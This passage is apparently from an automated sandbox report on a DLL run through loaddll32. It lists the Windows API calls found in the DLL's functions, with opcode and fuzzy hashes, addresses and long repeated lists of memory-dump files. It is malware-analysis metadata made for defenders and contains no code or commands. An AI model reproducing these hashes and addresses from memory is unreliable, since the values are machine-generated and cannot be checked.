                              • Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorLast$Send
                              • String ID:
                              • API String ID: 1282938840-0
                              • Opcode ID: 392c4665902d213a33f4054b81a8b9a0308c0fbc43f443decc8e889c0bd42223
                              • Instruction ID: a34516960f3cc3c2ad0006324c7f7f153c5e7a198b868c8fadcd0d1f1de193c8
                              • Opcode Fuzzy Hash: 392c4665902d213a33f4054b81a8b9a0308c0fbc43f443decc8e889c0bd42223
                              • Instruction Fuzzy Hash: 8301F731605218FBEF208A90CD86FAB37B8EF46779F340159F524AB6C0DF7599008791
                              APIs
                              • __EH_prolog.LIBCMT ref: 6CEB2D18
                              • DeleteCriticalSection.KERNEL32(?,?,?,?,6CEB2CF9,00000000,?,?,6CEB9994), ref: 6CEB2D5B
                              Memory Dump Source
                              • Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true
                              • Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: CriticalDeleteH_prologSection
                              • String ID:
                              • API String ID: 3454226681-0
                              • Opcode ID: 066d739eb3a6077976c59d560b07bc4a228af1f553f701b56f2f35e207daa7dd
                              • Instruction ID: e0a9013bdd8f20bcb75e8d9fb19b6cc76afc673abcdb42531252c926aa104201
                              • Opcode Fuzzy Hash: 066d739eb3a6077976c59d560b07bc4a228af1f553f701b56f2f35e207daa7dd
                              • Instruction Fuzzy Hash: D301AD36B01A108FC715CF68C508BAAB3B0FF89715B21865EE426A7B10CB70F9028F91
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true
                              • Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateFile
                              • String ID:
                              • API String ID: 823142352-0
                              • Opcode ID: 85da19cb9718f0f4174ece2e551903f916d3106d294e82e3c6438b44ded168dc
                              • Instruction ID: c7e2b7f382e15aaba3da55e720988bb5c21b90d2a754a6285c597935e8af0081
                              • Opcode Fuzzy Hash: 85da19cb9718f0f4174ece2e551903f916d3106d294e82e3c6438b44ded168dc
                              • Instruction Fuzzy Hash: C24182B361C6109FE3156E18D8856AAB7E5EF98720F17092DE7C983740EA3098418BD6
                              APIs
                              • __EH_prolog.LIBCMT ref: 6CEB5620
                                • Part of subcall function 6CEB2E7A: InterlockedExchange.KERNEL32(?,00000000), ref: 6CEB2E83
                                • Part of subcall function 6CEB2DB5: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 6CEB2DEE
                              Memory Dump Source
                              • Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true
                              • Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExchangeInterlocked$H_prolog
                              • String ID:
                              • API String ID: 101647241-0
                              • Opcode ID: 86999fa516c29e3bd91966a9bc4bc53e28e3fff49faff3f64bfdadad742ff2fa
                              • Instruction ID: 2f9dd647d8f5001022321ec8092692c56d99eee6abeb7ad170587845d870d380
                              • Opcode Fuzzy Hash: 86999fa516c29e3bd91966a9bc4bc53e28e3fff49faff3f64bfdadad742ff2fa
                              • Instruction Fuzzy Hash: 23418E719012099ACF04EBF0DAA49FDB779AF25248F20442DE812B7B90EF349B0DC790
                              APIs
                              • WSASetLastError.WS2_32(00000000,00000000,?,?,6CEB9EE6,?,6CEF14BC,6CEF14A0,?,?,?,?,?,?,?,6CEB83FF), ref: 6CEB3088
                              Memory Dump Source
                              • Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true
                              • Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorLast
                              • String ID:
                              • API String ID: 1452528299-0
                              • Opcode ID: 5bd75a3959ccf59cdc62f52f93f1432a0bdace95cdf60213dd858fb8e1d0edb1
                              • Instruction ID: f4d846b6c1a9099bd5b8e977a69dd181c09e9271f3dd32e5a54e83e0909f525b
                              • Opcode Fuzzy Hash: 5bd75a3959ccf59cdc62f52f93f1432a0bdace95cdf60213dd858fb8e1d0edb1
                              • Instruction Fuzzy Hash: 2621F5B1A04608ABEB149BA9DE419FE77BDDF4436CF20015DE919737C0DF305D0886A1
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true
                              • Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Query_
                              • String ID:
                              • API String ID: 428220571-0
                              • Opcode ID: 2c75a0694e232a8d556985b0fdb2ab5fee0902529e61c6e3cdad9857ef2ef72f
                              • Instruction ID: 8df7631a4240214b4f7e1260f3d3611dafca54d3b7ddc252b4b9cbf1c7971605
                              • Opcode Fuzzy Hash: 2c75a0694e232a8d556985b0fdb2ab5fee0902529e61c6e3cdad9857ef2ef72f
                              • Instruction Fuzzy Hash: 680184F770D600AFF7025A19ECC17BABBE5FBD9720F05852EE7C082614DA3248018667
                              APIs
                              • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 6CEB3FA0
                                • Part of subcall function 6CEB3954: __EH_prolog.LIBCMT ref: 6CEB3959
                              Memory Dump Source
                              • Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true
                              • Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
